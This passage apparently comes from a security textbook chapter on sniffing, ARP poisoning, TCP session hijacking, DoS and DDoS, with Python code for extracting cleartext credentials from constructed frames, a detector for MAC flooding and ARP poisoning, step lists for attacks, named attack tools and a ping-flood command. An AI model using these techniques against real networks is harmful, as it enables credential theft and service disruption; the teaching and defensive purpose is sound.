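    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 65535, 0, 0)
    return eth + ip_hdr + tcp_hdr + payload


# Constructed captures: an FTP login, an HTTP request with Basic auth, and a TLS record.
SAMPLE_FTP = make_frame("192.168.1.50", "192.168.1.210", 51514, 21, b"USER alice\r\nPASS s3cret\r\n")
SAMPLE_HTTP = make_frame("10.0.0.5", "10.0.0.80", 40000, 80,
                         b"GET /admin HTTP/1.1\r\nHost: intranet\r\n"
                         b"Authorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n")
SAMPLE_TLS = make_frame("10.0.0.5", "10.0.0.80", 40001, 443, b"\x16\x03\x01\x00\x05hello")

if __name__ == "__main__":
    for frame in (SAMPLE_FTP, SAMPLE_HTTP, SAMPLE_TLS):
        pkt = parse_frame(frame)
        print(pkt["src_ip"], "->", pkt["dst_ip"], pkt["dport"], extract_credentials(pkt))
```

The TLS sample yields nothing, which is the whole argument for the encrypted replacements (SSH, SFTP, HTTPS, IMAPS/POP3S) discussed later in this section: the same capture position sees the same frames, but the payload no longer carries anything the extractor can read.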
Of course, the traffic that a station can see varies depending on the network design, as you can't sniff what you can't see. There are two types of sniffing that can be used to observe traffic: passive and active. Passive sniffing takes place on networks such as those that have a hub as the connectivity device. With a hub in place, all stations are on the same collision domain, so all traffic can be seen by all other stations. In networks that have connectivity hardware that is smarter or more advanced, such as those with a switch, active sniffing is needed. For example, when a switch is in use, if traffic is not destined for a specific port, it isn't even sent to the port; therefore, there is nothing to observe.

In the Open Systems Interconnection (OSI) reference model, the sniffer functions at the data link layer. This layer is low in the hierarchy of layers, so not much "intelligence" is present (meaning that little filtering or refinement of the data is occurring). A sniffer is able to capture any and all data that happens to pass by on the wire, which even includes data that would otherwise be hidden by activities occurring at higher layers.

NOTE Understanding the OSI reference model is an essential skill, and you should make sure to spend time reviewing and understanding the model well.

Before sniffing on any network, make sure you have permission from the network owner. Sniffing traffic on networks when you do not have permission to do so can lead to serious problems up to and including legal repercussions. Title 18, Section 2511 of the U.S. Code, which covers electronic crimes including those that would fall under the term "sniffing," prohibits the "interception and disclosure of wire, oral, or electronic communications" by anyone who "intentionally intercepts, endeavors to intercept, or procures any other person to intercept or endeavor to intercept, any wire, oral, or electronic communication." Penalties for engaging in this activity can be anything from fines to civil and criminal penalties.

Passive Sniffing

Passive sniffing works when the traffic you wish to observe and the station that will do the sniffing are in the same collision domain. Passive sniffing works when a device known as a hub is in use. This is the key feature that makes this setup work. Think of the way a hub functions: traffic that is sent to one port on a hub is automatically repeated to all other ports on the hub. Because any station can transmit at any time, collisions can and do happen; the set of stations that can collide with one another is a collision domain. When this type of situation exists, it is possible to listen in on traffic on the network quite easily because every station shares the same logical transmission area. What thwarts passive sniffing is a switch that separates the network into multiple collision domains, therefore creating a situation in which stations do not transmit in the same logical area. Basically, passive sniffing is effective when the observer and the victim are positioned so that each can see the other's frames.

Sniffing may sound like a formidable threat to the security of information, and it definitely can be, but it can have its impact blunted to a certain degree. The answer is to use encryption for data in transit, specifically data that is of an extra-sensitive nature. The rise in usage of protocols such as Secure Sockets Layer (SSL), Internet Protocol Security (IPSec), Secure Shell (SSH), and others has made passive sniffing much less effective. Of course, you should always remember that encryption can protect information, but use it only when necessary to avoid overburdening processors on the sending and receiving systems.
The key to getting the most from passive sniffing is to plan carefully. Look for those locations on the network that will act as chokepoints for traffic, or those locations that the traffic you are looking for will pass through. Placing a sniffer on a collision domain different from the one that is to be observed will not yield the results that you desire, so placement must always be considered. Some points to remember about passive sniffing:

• Passive sniffing is difficult to detect because the attacker does not transmit anything on the network as a practice.
• Passive sniffing takes place and is effective when a hub is present.
• Passive sniffing can be done very simply. It can be as simple as an attacker plugging into a network hub and loading a sniffer.

Active Sniffing

So what happens if a network is broken into different collision domains using the power of switches? It would seem in these situations that the target is out of reach, but this problem can be overcome with the power of active sniffing. Because a switch limits the traffic, a sniffer can see only the traffic that is specifically addressed to its own system. Active sniffing is necessary to see the traffic that is not addressed to that system. Active sniffing involves sniffing when a switch is present on the network. This technique is employed in environments where sniffing using passive methods would be ineffectual due to the presence of switches. Active sniffing requires the introduction of traffic onto the network and as such can be detected relatively easily. In order to use active sniffing, an understanding of two techniques is necessary, both of which are used to get around the limitations that switches put in place. These techniques are known as media access control (MAC) flooding and Address Resolution Protocol (ARP) poisoning, both of which are valuable tools in your arsenal.
MAC Flooding

The first technique to bypass switches is MAC flooding: the ability to overwhelm the switch with traffic designed to cause it to fail. A closer look at this attack reveals how it succeeds in its task of causing the switch to fail. Switches contain some amount of memory (known as content addressable memory, or CAM) onboard that is used to build what is called a lookup table, which is then used to track which MAC addresses are present on which ports on the switch. This memory allows a lookup to be performed to let the switch get traffic to the correct port and host as intended. This lookup table is built by the switch during normal operation and resides in the CAM. The goal of MAC flooding is to exploit a design defect or oversight in some switches, which is that they have only a limited amount of memory. An attacker can flood this memory with information in the form of MAC addresses and fill it up quickly until it cannot hold any more information. In the event that this memory fills up, some switches will enter a fail-open state.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

Both MAC flooding and ARP poisoning generate some level of activity on the network and possibly on the clients themselves. This is the drawback of active sniffing: the introduction of traffic onto the network, and the fact that your presence is now detectable by anyone or anything that may be looking. Passive sniffing has the advantage of being much stealthier, as the presence of the sniffer is not as obvious due to the lack of broadcast information.

When a switch enters this fail-open state, the switch now becomes functionally a hub, and you are back to where you started with passive sniffing. By performing this attack on a switched network with a vulnerable switch, it is possible to attain a state where traffic that might not otherwise be sniffed now can be.
Of course, you don't get something for nothing; in this case, the amount of traffic that is introduced on the network can make sniffing impossible, as well as send up a huge red flag to anyone or anything that may be watching for traffic anomalies.

MAC flooding involves overwhelming or flooding the switch with a high volume of requests. This technique overwhelms the memory on the switch used to map MAC addresses to ports. MAC flooding is performed by sending enough traffic through the switch that the memory and switch cannot keep up. Once the CAM is overwhelmed, the switch acts like a hub. To make this attack easy, there is a diverse set of tools available to the security professional and hacker:
• EtherFlood — This utility has the ability to clog a switch and network with Ethernet frames with bogus, randomized hardware addresses. By flooding the network with such frames, the net effect is what is expected with MAC flooding: a switch that fails over to hub behavior.
• SMAC — A MAC spoofing utility that is designed to change the MAC address of a system to one that the attacker specifies. In modern operating systems from Windows XP forward, and in most Linux variants, this utility is not even necessary because the MAC address can be changed in the graphical user interface (GUI) or at the command line using tools bundled with the operating system (OS) itself.
• Macof — Designed to function like EtherFlood and overwhelm the network with bogus or false MAC addresses to cause the switch to fail to hub behavior.
• Technitium MAC Address Changer — Designed to function much like SMAC, in that it can change the MAC address of a system to one the user desires instead.

Address Resolution Protocol (ARP) Poisoning

The other method of bypassing a switch to perform sniffing is via Address Resolution Protocol (ARP) poisoning.
Here are some key points:
• Address Resolution Protocol (ARP) is a protocol defined at the network layer which is used to resolve an IP address to a physical or MAC address.
• In order to locate a physical address, the requesting host will broadcast an ARP request to the network.
• The host that has the IP address that is sought after will return its corresponding physical address.
• ARP packets can be spoofed or custom crafted to redirect traffic to another system such as the attacker's.
• ARP poisoning can be used to intercept and redirect traffic between two systems on the network.
• MAC flooding can clog and overwhelm a switch's CAM, forcing it into what is known as forwarding mode.

NOTE: ARP resolves logical addresses to the physical address of an interface. If you are still unclear about the ARP process, refer to Chapter 2 and the discussion on ARP and the OSI reference model.

[Figure 12-1: ARP poisoning in practice. Labels: Router, IP 10.0.0.1, MAC cc:cc:cc:cc:cc:cc; Zelda, IP 10.0.0.10, MAC aa:aa:aa:aa:aa:aa; Ganon, IP 10.0.0.3; Link's MAC ee:ee:ee:ee:ee:ee. "Regular Network Route" runs between Zelda and the Router. "Modified ARP cache" on the Router points IP 10.0.0.10 to ee:ee:ee:ee:ee:ee (Link's MAC); "Modified ARP cache" on Zelda points IP 10.0.0.1 to ee:ee:ee:ee:ee:ee (Link's MAC); a further entry points IP 10.0.0.3 to ee:ee:ee:ee:ee:ee.]

With knowledge of the ARP process in hand, it is very easy to understand the mechanics of ARP poisoning or ARP spoofing. ARP poisoning works by sending out bogus ARP requests to any requesting device and the switch. The idea is to force traffic to a location other than the intended target and therefore sniff what is being sent and received. When the bogus requests are sent out, the switch stores them. Other clients will then automatically send traffic to the new target, as they will check their cache first, where the bogus entry has been stored.
Figure 12-1 illustrates ARP poisoning in practice. Here are the steps in the process:
1. Attackers send out a broadcast stating that a given IP address (such as a router or gateway) maps to their own MAC address.
2. A victim on the network initiates a communication that requires exiting the network or subnet.
3. When the traffic is transmitted, the ARP mapping shows that the router's IP address maps to a specific MAC address, so traffic is forwarded to the attacker instead.
4. To complete the sequence and avoid arousing suspicion, the attacker forwards traffic to the real destination (in this case, the router).

NOTE: Not forwarding traffic on to the original destination would arouse suspicion that would tip off the network administrator to the attacker's presence.

Here are some points to remember about ARP poisoning:
• Anyone can download malicious software used to run ARP spoofing attacks from the Internet.
• Attackers can use bogus ARP messages to redirect traffic.
• It is possible to run DoS attacks with this technique.
• It can be used to intercept and read data.
• It can be used to intercept credentials such as usernames and passwords.
• It can be used to alter data in transmission.
• It can be used to tap voice over IP (VoIP) phone calls.

Several utilities in your security professional toolbox are specifically designed to carry out ARP spoofing, no matter what your OS of choice may be. The following list details some of the options available to you:
• Arpspoof — Designed to redirect traffic in the form of packets from a victim's system. Performs redirection by forging ARP replies. This utility is part of the popular Dsniff suite of utilities.
• Cain — The "Swiss army knife" of tools; can perform ARP poisoning, enumeration of Windows systems, sniffing, and password cracking.
• Ettercap — An old but very capable protocol analyzer that can perform ARP poisoning, passive sniffing, protocol decoding, and packet capture.
• Internal Revenue Service (IRS) — Not a port scanner; it is a "valid source IP address" scanner for a given service. Combines ARP poisoning and half-scan processes and attempts TCP connections to a specific victim.
• ARP Works — Utility for creating customized packets over the network that perform the ARP announce feature.
• Nemesis — Can perform some ARP spoofing.

Sniffing Tools

Several very capable sniffing tools are available, including the popular ones in the following list:
• Wireshark — One of the most widely known and used packet sniffers. Offers a tremendous number of features designed to assist in the dissection and analysis of traffic. Wireshark is the successor to the Ethereal packet sniffer.
• Tcpdump — A well-known command line packet analyzer. Provides the ability to intercept and observe TCP/IP and other packets during transmission over the network.
• WinDump — A port of the popular Linux packet sniffer known as tcpdump, which is a command line tool that is great for displaying header information. Tcpdump is available at http://www.tcpdump.org.
• Omnipeek — Manufactured by WildPackets, Omnipeek is a commercial product that is the successor to its EtherPeek product.
• Dsniff — A suite of tools designed to perform sniffing with different protocols with the intent of intercepting and revealing passwords. Dsniff is designed for UNIX and Linux platforms and does not have a complete equivalent on the Windows platform.
• EtherApe — A Linux/UNIX tool that is designed to graphically display the connections incoming to and outgoing from a system.
• MSN Sniffer — A sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application.
• NetWitness NextGen — A hardware-based sniffer, plus other features, designed to monitor and analyze all traffic on a network; a popular tool in use by the FBI and other law enforcement agencies.

Not all traffic needs to be protected, and it may not even be feasible to do so. Remember that all extra countermeasures that are deployed are extra devices and processes to support and are extra overhead on the network.

To defeat sniffing, a number of countermeasures can be employed, including the following:
• Encryption — Protecting traffic from being sniffed can be as simple as making it undecipherable to those not having the key. Encrypting select data through the use of technologies such as IPSec, SSL, virtual private networks (VPNs), and other related techniques can be a simple but effective way of thwarting sniffing. The downside here is that the process of encryption costs in processor power and performance.
• Static ARP entries — Configuring a device with the MAC addresses of the devices that may use it can block a number of attacks, but can be difficult to manage.
• Port security — Switches have the ability to be programmed to allow only specific MAC addresses to send and receive data on each port.

When considering network security and thwarting the power of sniffing, you should consider which protective measures are appropriate and which are not. In the case of encryption, for example, not all traffic needs to be encrypted because not all network traffic is of a sensitive nature. Always consider the exact nature of the traffic, too. Remember, just because you can do something does not mean you should.
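As an added example (not from the book), here are the two checks a defender would run against the MAC flooding and ARP poisoning techniques described above, written in Python over constructed frame records from a switch mirror port: a per-port count of distinct source MACs (the condition that port security enforces) and an arpwatch-style comparison of ARP replies against a static table and against earlier replies (the static ARP entry countermeasure). The Frame class, the thresholds and the sample traffic, which reuses the addresses from Figure 12-1, are assumptions made for this example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Frame:
    """One Ethernet frame seen on a switch mirror (SPAN) port. Constructed for this example."""
    port: int                      # switch port the frame arrived on
    src_mac: str                   # Ethernet source address
    arp_op: Optional[str] = None   # "reply" for ARP replies, None for non-ARP traffic
    sender_ip: Optional[str] = None
    sender_mac: Optional[str] = None


def mac_flood_alerts(frames: List[Frame], max_macs_per_port: int = 8) -> Dict[int, int]:
    """Return {port: distinct_source_macs} for every port exceeding the limit.

    An access port normally carries a handful of addresses; a burst of fresh,
    randomized source MACs on one port is the signature of CAM table flooding.
    The same per-port limit is what a switch's port-security feature enforces.
    """
    seen: Dict[int, Set[str]] = defaultdict(set)
    for f in frames:
        seen[f.port].add(f.src_mac.lower())
    return {port: len(macs) for port, macs in seen.items() if len(macs) > max_macs_per_port}


def arp_poison_alerts(frames: List[Frame], static_arp: Dict[str, str]) -> List[Tuple[str, str]]:
    """Check ARP replies against a static IP-to-MAC table and against earlier replies.

    Returns (kind, detail) pairs:
      static-violation  a reply contradicts a configured static entry
      mapping-changed   an IP silently moved to a different MAC (arpwatch-style check)
      multi-ip-mac      one MAC claims several IPs, as when both ends of a path are poisoned
    """
    alerts: List[Tuple[str, str]] = []
    learned: Dict[str, str] = {}
    claims: Dict[str, Set[str]] = defaultdict(set)
    for f in frames:
        if f.arp_op != "reply":
            continue
        ip, mac = f.sender_ip, f.sender_mac.lower()
        expected = static_arp.get(ip)
        if expected is not None and expected.lower() != mac:
            alerts.append(("static-violation", f"{ip} is {expected}, reply claims {mac}"))
        elif ip in learned and learned[ip] != mac:
            alerts.append(("mapping-changed", f"{ip} moved from {learned[ip]} to {mac}"))
        learned[ip] = mac
        claims[mac].add(ip)
    # A host with several addresses is legitimate; treat this as a lead, not proof.
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(("multi-ip-mac", f"{mac} answers for {sorted(ips)}"))
    return alerts


# Constructed traffic using the addresses from Figure 12-1: Router 10.0.0.1 (cc:...),
# Zelda 10.0.0.10 (aa:...), and Link (ee:...) answering for both of them on port 3.
SAMPLE_FRAMES: List[Frame] = [
    Frame(1, "cc:cc:cc:cc:cc:cc", "reply", "10.0.0.1", "cc:cc:cc:cc:cc:cc"),
    Frame(2, "aa:aa:aa:aa:aa:aa", "reply", "10.0.0.10", "aa:aa:aa:aa:aa:aa"),
    Frame(3, "ee:ee:ee:ee:ee:ee", "reply", "10.0.0.1", "ee:ee:ee:ee:ee:ee"),
    Frame(3, "ee:ee:ee:ee:ee:ee", "reply", "10.0.0.10", "ee:ee:ee:ee:ee:ee"),
] + [Frame(7, f"02:00:00:00:00:{i:02x}") for i in range(12)]   # 12 random MACs on port 7

STATIC_ARP = {"10.0.0.1": "cc:cc:cc:cc:cc:cc"}   # gateway pinned as a static entry

if __name__ == "__main__":
    print("MAC flooding:", mac_flood_alerts(SAMPLE_FRAMES))
    for kind, detail in arp_poison_alerts(SAMPLE_FRAMES, STATIC_ARP):
        print(f"{kind}: {detail}")
```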
Session Hijacking

The next type of attack that can be used to alter and interrupt communications on a network is the technique known as session hijacking. Hijacking a session falls under the category of active attacks in that you must directly and somewhat aggressively interact with the network and the victims on it. Hijacking builds on the techniques discussed in our previous section on sniffing and raises the stakes by taking over the communication between two parties. Once attackers decide to undertake a session hijacking, they will be actively injecting packets into the network with the goal of disrupting and taking over an existing session on the network. Ultimately the session hijack will attempt to take over a session that is already authenticated to a resource to be attacked.

Here's a high-level view of what session hijacking looks like:
1. Insert yourself between Party A and Party B.
2. Monitor the flow of packets using sniffing techniques.
3. Analyze and predict the sequence number of the packets.
4. Sever the connection between the two parties.
5. Seize control of the session.
6. Perform packet injection into the network.

To summarize, session hijacking is the process of taking over an already established session between two parties. Some points to remember about session hijacking:
• TCP session hijacking is in process when an attacker seizes control of an existing TCP session between two systems.
• Session hijacking takes place after the authentication process that occurs at the beginning of a session.
Once this process has been undertaken, the session can be hijacked, and access to the authenticated resources can take place.
• Session hijacking relies on a basic understanding of how messages and their associated packets flow over the Internet.
• Session hijacking, much like sniffing, has two forms: active and passive.

Each form of session hijacking has its advantages and disadvantages that make it an attractive option to the attacker. Let's compare and contrast the two to see what they offer an attacker.
• Active session hijacking — Active attacks are effective and useful to the attacker because they allow the attacker to search for and take over a session at will. In active session hijacking, the attacker will search for and take over a session and then interact with the remaining party as if the attacker were the party that has been disconnected. The attacker assumes the role of the party he has displaced, in other words.
• Passive session hijacking — Passive attacks are different in that the attacker locates and hijacks a session of interest, but does not interact with the remaining party. Instead, in passive session hijacking, attackers switch to an observation type mode where they record and analyze the traffic as it moves. Passive hijacking is functionally no different from sniffing.

Identifying an Active Session

Earlier, when sniffing was discussed, the process was that of observing traffic on the network. Session hijacking builds on this process and refines it. Session hijacking adds the goal of not only observing the traffic and sessions currently active on the network but also taking over one of these sessions that has authenticated access to the resource you want to interact with. For a session hijack to be successful, the attacker must locate and identify a suitable session for hijacking. It sounds like a simple process until factors such as different network segments, switches, and encryption come into play.
If you factor in the very real issue of having to uncover sequence numbers on packets in order to properly take control of a session, the challenges mount significantly. But they are not insurmountable. Remember that while the challenges are not small, what is on the line is the ability to interact with and execute commands against authenticated resources.

NOTE: Session hijacking builds on the techniques and lessons learned in passive and active sniffing, so you may want to review those lessons again if you are not completely clear on them. Session hijacking takes sniffing and moves these lessons to the next level, where you move from listening to interacting, which is more aggressive by nature.

Consider some of the challenges standing in the way of successful session hijacking:
• Sequence numbers — Every packet has a unique 32-bit number embedded into its header that identifies it and how it should be reassembled with its fellow packets to regenerate the original message.
• Network segments — When the attacker and victims are on the same network segment or on a network that uses a hub, observing traffic works like basic sniffing. However, if the victim and the attacker are on two different network segments separated by a switch, it becomes more difficult to carry out an attack, and techniques akin to the active sniffing techniques are needed.

Take a look at the sequence number problem. Let's review the steps involved in session hijacking once again:
1. Insert yourself between Party A and Party B.
2. Monitor the flow of packets using sniffing techniques.
3. Analyze and predict the sequence number of the packets.
4. Sever the connection between the two parties.
5. Seize control of the session.
6. Perform packet injection into the network.

Look at Step 1 — this step is easy on a network on which you can see both parties.
On these types of networks you can sniff the traffic passively and read the sequence numbers off of the packets themselves. On a switched network, it becomes much more of an issue because you cannot see the other party (or parties), so you must use techniques to guess the sequence number correctly (you can't just stumble in with whatever number you want). In this situation, you will send several packets to the victim or target in order to solicit a response with the sequence numbers on it.

Sequence numbers are a cornerstone of TCP that makes a number of features that you may take for granted possible. In TCP every piece or byte of data must have a sequence number assigned to it to track the data, assemble it with its fellow packets, and perform flow control. So where and when do the sequence numbers get assigned? During the three-way handshake, which is illustrated in Figure 12-2.

NOTE: In the past, some operating systems did allow for the methodical and mathematical creation of sequence numbers. This was possible because these operating systems implemented very predictable sets of sequence numbers. Most operating systems now avoid this by randomly generating sequence numbers as a security measure.

FYI: Some facts about sequence numbers:
• Sequence numbers are a 32-bit counter. The possible combinations can be more than 4 billion.
• Sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.
• An attacker must successfully guess the sequence numbers in order to hijack a session.

[Figure 12-2: Three-way handshake: SYN, SYN-ACK, ACK.]

Here are some points to bear in mind about sequence number prediction:
• When a client transmits a SYN packet to a server, the response will be a SYN-ACK. This SYN-ACK will be responded to with an ACK.
• During this handshake, the starting sequence number will be assigned using a random method if the operating system supports this function.
• If this sequence number is predictable, the attacker will initiate the connection to the server with a legitimate address and then open up a second connection from a forged address.
• Once an attacker has determined the correct sequence numbers, the next move is to inject packets into the network.

Of course, this is easier said than done, and just injecting packets into the network is not useful in every case because a few details must be in place first. Consider the two extremes of the session: the beginning and the end. At the beginning of the session, the process of authentication takes place, and injecting packets into the network and taking over the session here would be worthless if done prior to the authentication process (after all, you want an authenticated session). On the other hand, injecting packets too late, such as when the session is getting torn down or closed, will mean that the session you want to hijack is no longer present.

With the proper sequence numbers predicted and known, the attack can move to the next phase, which is to unplug one of the parties, such as a server if one is present. The goal at this stage is to knock out or remove one of the parties from the communication in order to get them out of the way. The removal can be performed by any method the attacker chooses, from a simple DoS to sending a connection reset request to the victim.

NOTE: You must wait for authentication to take place prior to taking over a session because without doing so you don't have trust, and in this case the system you are trying to interact with has no knowledge of you.

Seizing Control of a Session

At this point, the attacker now has control of a session and can move toward carrying out dirty work, whatever it may be. The trick for the attacker is to keep the session maintained and active, because as long as this connection is maintained and kept alive, the attacker has an authenticated connection to their intended target.
Session Hijacking Tools

In order to perform session hijacking you can use a number of different tools, each having its own advantages and disadvantages. Each of the tools on this list has seen widespread use by hackers and will offer you the ability to perform session hijacking quite easily. Each of these tools is essentially a packet sniffer with the enhanced capability needed to perform session hijacking.
• Ettercap — An old-school tool that has the advantage of being multiplatform, so you can learn how to use it on one platform and move those skills over easily to another platform such as Mac OS X. Ettercap possesses robust capabilities that enable it to perform its duties quite well. Included in this functionality is the ability to perform man-in-the-middle attacks, ARP spoofing, and session hijacking.
• Hunt — This is a commonly used tool for performing session hijacking; in fact, it is the first one most hackers and security professionals are introduced to. This software has the ability to observe and hijack a session between two parties, and also has the ability to fire off TCP resets to shut down a victim system. This software package is designed to work on Ethernet-based networks and can work in both passive and active modes.
• IP Watcher — This utility is a commercial-grade tool (read: you have to pay for it) that can perform session hijacking and monitor connections so you can choose the session you wish to take over.
• T-Sight — Another commercial offering that can hijack TCP sessions on a network much like IP Watcher.
• Remote TCP Reset — Is designed to find and reset an existing TCP connection.

Thwarting Session Hijacking Attacks

Session hijacking is dangerous. But you can limit its impact to a great degree through the proper application of your two best lines of defense: being proactive and looking for the signs of an attack.
One of your tools for this is something you read about earlier: encryption. After all, it is hard for troublemakers to hijack a session if they can't see what is being transmitted. Other measures you can use include configuring routers to block spoofed traffic from outside the protected network. Additionally, you can use countermeasures such as an intrusion detection system (IDS) that can watch for suspicious activity and alert you to it, or even actively block this traffic automatically.

Denial of Service (DoS) Attacks

An older type of attack that still plagues the Internet and the computer systems attached to it is the DoS, which is a threat against one of the core tenets of security: availability. This makes sense when you consider that a DoS is designed to target a service or resource, and deny access to it by legitimate users. In this section, you will take a look at this simple form of hacking: what it can do as well as how it works.

NOTE: DoS attacks are commonly used by those who fall in the category of script kiddies due to the relative simplicity of the attack. Don't be lulled into a false sense of security, however, as more advanced hackers have been known to use this attack as a last resort (as a way of shutting down a service that they were unable to get access to).

NOTE: The use of DoS to extort money has increased over the past few years as criminals have become more adept at using technology.

A DoS functions by tying up valuable resources that could be used to service legitimate needs and users. In essence, a DoS functions like this: Imagine someone calling your cell phone over and over again; at some point they call often enough that no one else could call you, nor could you call out. At that point you would become the victim of a DoS. Translate this scenario into the world of computer networks, and you have a situation where availability of a service is similarly threatened.
DoS attacks used to be used to annoy and irritate a victim, but over the past few years these attacks have evolved into something much more ominous: a means to extort money and commit other crimes. For example, a criminal may contact a victim and ask for protection money to prevent any unfortunate "accidents" from happening.

To summarize, the main points of a DoS action are to:
• Deny the use of a system or service through the systematic overloading of its resources. An attacker is seeking a result in which the system becomes unstable, substantially slower, or overwhelmed to the point it cannot process any more requests.
• Be carried out when an attacker fails at other attempts to access the system and just decides to shut down a system in retaliation.

Categories of DoS Attacks

DoS attacks are not all the same. They can be broken down into three broad categories based on how they carry out their goal of denying the service to legitimate uses and users:
• Consumption of bandwidth
• Consumption of resources
• Exploitation of programming defects

Consumption of Bandwidth

Bandwidth exhaustion is one of the more common attacks to be observed in the wild. This type of attack is in effect when the network bandwidth flowing to and from a machine is consumed to the point of exhaustion. It may seem to some that the solution here would be to add enough bandwidth that it cannot be easily exhausted, but the keyword is "easily" exhausted — it does not matter how much bandwidth is allocated to a system; it is still a finite amount. In fact, an attacker does not have to completely exhaust bandwidth to and from a system, but rather use up so much of it that performance becomes unacceptable to users. So the attacker's goal is to consume enough bandwidth to make the service unusable.
Some well-known forms of attacks in this category include:
• Smurf — Through the exploitation of the Internet Control Message Protocol (ICMP) and spoofed packets to the broadcast address of a network, the attacker can generate a torrent of traffic from the sheer number of systems that may reply.
• Fraggle — This type of attack is similar to the smurf attack, with the difference being what it uses to consume bandwidth. In the case of fraggle attacks, bandwidth is consumed through the use of User Datagram Protocol (UDP) packets instead.
• Chargen — This protocol was originally designed for testing and evaluation purposes, but it can be used to perform a DoS by generating traffic rapidly. By doing so, chargen can consume the bandwidth on a network rapidly, at which point a DoS will have occurred.

Consumption of Resources

Much like bandwidth consumption, the goal of resource consumption-based attacks is to eat up a limited resource. However, unlike bandwidth consumption, the goal is not shared among multiple systems; instead it is targeting the resources on a single system. When an attack of this nature is carried out, a service or an entire system may become overloaded to the point where it slows, locks, or crashes. This type of attack can vary in how it is approached; the following list is some of the more common forms of this attack:
• SYN flood — This type of attack uses forged packets with the SYN flag set. When the victim receives enough of the packets, the result is an overwhelmed system as the SYN flood consumes connection resources to the point where no resources are available for legitimate connections.
• ICMP flood — This type of attack comes in two variants: smurf attack and ping flood.
• Smurf attack — Carried out when a large amount of traffic is directed to the broadcast address of a network instead of to a specific system.
By sending traffic to a broadcast address of a network, the request is sent to all hosts on the network, which respond in turn. However, because the attacker will take the extra step of configuring the packet with the intended victim as the source, all the hosts on the network will respond to the victim instead of to the attacker. The result is that a flood of traffic overwhelms the victim, causing a DoS.
• Ping flood — Carried out by sending a large amount of ping packets to the victim with the intent of overwhelming the victim. This attack is incredibly simple, requiring only basic knowledge of the ping command, the victim's IP, and more bandwidth than the victim. In Windows, the command to pull off such an attack would be: ping -t <victim IP address>
• Teardrop attack — In this type of attack, the attacker manipulates IP packet fragments in such a way that when reassembled by the victim, a crash occurs. This process involves having fragments reassembled in illegal ways or having fragments reassembled into larger packets than the victim can process.
• Reflected attack — This type of attack is carried out by spoofing or forging the source address of packets or requests and sending them to numerous systems, which in turn respond to the request. This type of attack is a scaled-up version of what happens in the ping flood attack.

Exploitation of Programming Defects

Consuming bandwidth isn't the only way to carry out a DoS attack on a system. Another is to exploit known weaknesses in the system's design. Vulnerabilities of this type may have been exposed due to flaws in the system's design that were inadvertently put in place by the programmers or developers of the system. The following list has some of the more common methods of exploiting programming defects:
• Ping of death (PoD) — This type of attack preys upon the inability of some systems to handle oversized packets.
An attacker sends them out in fragments; when these fragments reach the system they are reassembled by the victim, and when the "magic size" of the 65,536 bytes allowed by the IP protocol is reached, some systems will crash or become victim to a buffer overflow.
• Teardrop — This attack succeeds by exploiting a different weakness in the way packets are processed by a system. In this type of attack, the packets are sent in a malformed state with their offset values adjusted so they overlap, which is illegal. When a system that does not know how to deal with this issue is targeted, a crash or lock may result.
• Land — In this type of attack, a packet is sent to a victim system with the same source and destination address and port. The result of this action is that systems that do not know how to process this crash or lock up.

NOTE: All these attacks have been around for years, and so you would expect systems to be designed to be less susceptible to them. However, this is not the case. It has been discovered time and time again that modern systems from all vendors can be vulnerable to these attacks if they are not patched and managed correctly.

NOTE: Some of these tools have been known to appear on systems seemingly inexplicably, which may be a sign of a system that has become part of a botnet, which will be discussed later in this chapter.

Tools for DoS

There are plenty of tools available to the hacker to perform a DoS attack, including:
• Jolt2 — A piece of software designed to flood a system with incorrectly formatted packets.
• Targa — This software is designed to attempt different types of attacks and has eight different variations to choose from.
• Crazy Pinger — This software is designed to send ping packets of varying sizes and other parameters to a victim.

FYI: Do not be confused — DoS and DDoS attacks are as similar as they are indeed different.
The two share some traits, but vary in others. Both attacks seek to overwhelm a victim with requests designed to lock up, slow down, or crash a system. The difference is in implementation: DoS is generally one system attacking another, and DDoS is many systems attacking another. It could be said the difference is scale.

Distributed Denial of Service (DDoS) Attacks

A distributed denial of service (DDoS) attack is a powerful tool for those who know how to use it. Security professionals have developed techniques to prevent these attacks, but hackers keep developing new methods of carrying them out.

Some Characteristics of DDoS Attacks

As you can readily imagine, a distributed attack, involving many compromised machines, is a more devastatingly effective way to commit a denial of service attack than simply using one machine to attack another. Here are some specifics you should know:

• Attacks of this type are characterized by being very large, using hundreds or thousands of systems to conduct the attack.
• DDoS has two types of victims, namely, primary and secondary. The former is the recipient of the actual attack; the latter are the systems used to launch the attack itself.
• The attack can be very difficult if not impossible to track back to its true source because of the sheer number of systems involved.
• Defense is extremely difficult due to the number of attackers. Configuring a router or firewall to block a small number of single IP addresses is child's play. Larger numbers of attackers are nearly impossible to block.
• Impact of this attack is increased over standard DoS because many hosts are involved in the attack, multiplying the attack's strength and power.
• A DDoS is an "upgraded" and advanced version of the DoS. The DDoS has the same goal as the DoS, which is to shut a system down by consuming resources, but does so through sheer force of numbers.

This type of attack generally tends to occur in two waves designed to position and carry out the attack. In the first wave, the attack is staged, and the targets that will be the "foot soldiers" are infected with the implements that will be used to attack the final victim. Targets for infection in this phase include systems that have high-speed connections, poorly defended home and business networks, and poorly patched systems. What is infecting these systems can and will vary, but it could include software such as the ones mentioned previously for a traditional DoS.

Wave 2 is the attack itself. Foot soldiers form the army of systems that will collectively attack a designated target. These infected systems can number in the thousands, hundreds of thousands, or even millions, awaiting the instruction that will turn their collective attention toward a target (these infected systems are called "zombies").

NOTE
The infected systems are not always referred to as "zombies"; they are sometimes called "bots" (short for robots) or, like the Borg in Star Trek, "drones." Whatever you call them, the goal is the same: to target a system and steamroll it with traffic.

These are the steps of the attack itself:

• Construct a piece of malware that will transmit packets to a target network/Web site.
• Convert a predefined number of computers to drones.
• Initiate the attack by sending signals to the drones to attack a specific target.
• Have drones initiate an attack against a target until they are shut down or disinfected.

A DDoS attack like this sounds simple, but in practice it is not, because it takes quite a bit of planning and knowledge to set up, not to mention a good amount of patience. To set this type of attack up, two components are needed: a software component and a hardware component.
On the software side, two items are needed to make the attack happen:

• Client-side software — This is the software that ultimately will be used to send command and control requests to launch an attack against the target. This software will be used by the attacker to initiate the opening stages of the attack.
